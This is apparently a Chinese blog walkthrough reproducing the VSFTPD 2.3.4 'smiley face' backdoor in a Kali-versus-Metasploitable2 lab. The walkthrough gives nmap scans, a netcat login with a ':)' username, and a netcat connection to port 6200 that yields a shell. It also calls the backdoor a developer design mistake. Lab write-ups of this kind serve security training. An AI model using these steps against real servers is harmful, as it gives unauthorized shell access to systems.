笑脸漏洞(VSFTPD2.3.4)复现
背景
漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。
攻击机:kali linux
靶机:Metasploitable2
0.网络配置,将kali与Metasploitable2放在同一主机下,以nat模式连接。
1.查看自己的ip
1 | ifconfig |
192.168.222.130
2.扫描自己ip下的端口
1 | nmap 192.168.222.0/24 |
发现192.168.222.133存在21端口
3.扫描该ip开启的服务
1 | nmap -sV 192.168.222.133 |
发现ftp服务版本为vsftpd2.3.4
4.查看6200端口是否开放
1 | nmap -p 6200 192.168.222.133 |
发现6200端口关闭
5.NetCat连接21端口
1 | nc 192.168.222.133 21 |
用户名输入笑脸符号:)
密码随意
1 | uesr a:) |
6.再次查看6200端口的开放情况
1 | nmap -p 6200 192.168.222.133 |
发现6200端口打开
7.拿到权限
1 | nc 192.168.222.133 6200 |
1 | whoami |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 FakerCsr's Magic Box!
相关推荐
评论